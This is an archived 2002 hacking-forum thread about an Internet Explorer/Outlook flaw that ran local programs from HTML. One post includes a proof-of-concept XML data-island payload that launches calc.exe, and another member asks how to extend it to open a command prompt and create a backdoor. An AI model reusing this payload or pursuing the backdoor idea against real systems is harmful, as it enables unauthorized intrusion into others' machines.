Previous Thread
Next Thread
Print Thread
Rate Thread
Joined: Mar 2002
Posts: 16
N
Nexus Offline OP
Junior Member
OP Offline
Junior Member
N
Joined: Mar 2002
Posts: 16
Extract from http://www.theregister.co.uk/content/4/24274.html

Quote:
An attacker can run arbitrary commands on Windows machines with a simple bit of HTML, an Israeli security researcher has demonstrated. The exploit will work with IE, Outlook and OutlooK Express even if active scripting and ActiveX are disabled in the browser security settings.


Further details at http://security.greymagic.com/adv/gm001-ie/

Joined: Mar 2002
Posts: 5
K
Junior Member
Offline
Junior Member
K
Joined: Mar 2002
Posts: 5
Actually I tried the code out in the article and it didn't work.

-Kryptic Codez

Joined: Mar 2002
Posts: 562
UGN Supporter
Offline
UGN Supporter
Joined: Mar 2002
Posts: 562
Same here. I get a screen with a pic that looks to have not loaded....

Joined: Mar 2002
Posts: 56
S
Junior Member
Offline
Junior Member
S
Joined: Mar 2002
Posts: 56
the code worked for me. i had to edit it to fix it so it worked with WINME (CALC was in C:\Windows\, not Windows\System)

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/CALC.exe"></object>
]]>
</exploit>
</security>
</xml>

I then tried to create a shortcut to Windows' Command.com, but it didn't work because when u create a shortcut to command.com, it is not considered an actual shortcut, but:

Type of File: Performs text-based (command-line) functions.


I then tried to get the code to pass functions to MS-DOS. unfortunately, for the same reason as above, you CANNOT open command.com because it is the same type of file as above.


Not knowing XML I cannot tell you how to do this, but the only work around I can think of is to know exactly what u are going to do (of course u will) and open Notepad and pass a command.com argument to it, then whatever argument to that, and same the file as perform.bat and save it then run it. all from the same XML file. if anyone knows how to do this, it would be great if I could see the code! thanks!

Joined: Mar 2002
Posts: 185
M
Member
Offline
Member
M
Joined: Mar 2002
Posts: 185
OK, let's say you take that code and use it to open up a command prompt like in the other post. Do you think it would be also possible to send a command along with the opening the command prompt? Because if you could then you could maybe turn on file sharing and things such as that which would make it quite simple to have a backdoor. I've been looking at it, but I don't really know javascript and can't figure out how/if to do it. Anyone?


Cha want some w***up?

http://www.dopeskill.com
Joined: Mar 2002
Posts: 562
UGN Supporter
Offline
UGN Supporter
Joined: Mar 2002
Posts: 562
Well that is XML not Javascript

Joined: Mar 2002
Posts: 185
M
Member
Offline
Member
M
Joined: Mar 2002
Posts: 185
Yeah, i know that's XML, but in the example in the other post they used javascript to do the same thing.


Cha want some w***up?

http://www.dopeskill.com
Joined: Mar 2002
Posts: 56
S
Junior Member
Offline
Junior Member
S
Joined: Mar 2002
Posts: 56
the fact of the matter is, it will not allow you to open a command prompt. the only way you could open a command prompt with this XML is to create a program that opens a command prompt, compile it, and have this link to the .EXE. of course, the person u use this on will not have that EXE on there computer, so it doesn't matter anyway. as i said above, you cannot open command.com, command.exe, ms-dos, etc.


Link Copied to Clipboard
Member Spotlight
Posts: 43
Joined: November 2002
Forum Statistics
Forums41
Topics33,840
Posts68,858
Average Daily Posts1
Members2,176
Most Online3,253
Jan 13th, 2020
Latest Postings
Where and how do you torrent?
by danni75 - 03/01/24 05:58 AM
Animation,
by JohanKaariainen - 08/15/19 01:18 AM
Blackbeard.....
by Gremelin - 10/03/18 07:02 PM
my old account still exists!
by Crime - 08/10/18 02:47 PM
Okay WTF?
by HenryMiring - 09/27/17 01:45 AM
The History Thread...
by Gremelin - 08/11/17 12:11 PM
My friend NEEDS your HELP!
by Lena01 - 07/21/17 12:06 AM
I'm having fun with this guy.
by gabithompson730 - 07/20/17 01:50 AM
I want to upgrade my phone
by gabithompson730 - 07/20/17 01:49 AM
Doom 3
by Cyrez - 09/11/14 08:58 PM
Amazon Gift Card Generator/KeyGen?te
by Gecko666 - 08/22/14 09:21 AM
AIM scene 99-03
by lavos - 09/02/13 08:06 AM
Planetside 2
by Crime - 03/04/13 07:10 AM
Beta Testers Wanted
by Crime - 03/04/13 06:55 AM
Hello Everyone
by Gremelin - 02/12/12 06:01 PM
Tracfone ESN Generator
by Zanvin Green - 01/18/12 01:31 PM
Python 3 issue
by Testing - 12/17/11 09:28 PM
tracfone airtime
by Drache86 - 07/30/11 03:37 AM
Backdoors and the Infinite
by ZeroCoolStar - 07/10/11 03:52 AM
HackThisZIne #12 Releaseed!
by Pipat2 - 04/28/11 09:20 PM
gang wars? l33t-wars?
by Gremelin - 04/28/11 05:56 AM
Consolidate Forums
by diggin2deep - 04/21/11 10:02 AM
LAN Hacking Noob
by Gremelin - 03/12/11 12:42 AM
Top Posters
UGN Security 41,392
Gremelin 7,203
§intå× 3,255
SilentRage 1,273
Ice 1,146
pergesu 1,136
Infinite 1,041
jonconley 955
Girlie 908
unreal 860
Top Likes Received
Ghost 2
unreal 1
Crime 1
Ice 1
Dartur 1
Powered by UBB.threads™ PHP Forum Software 7.7.5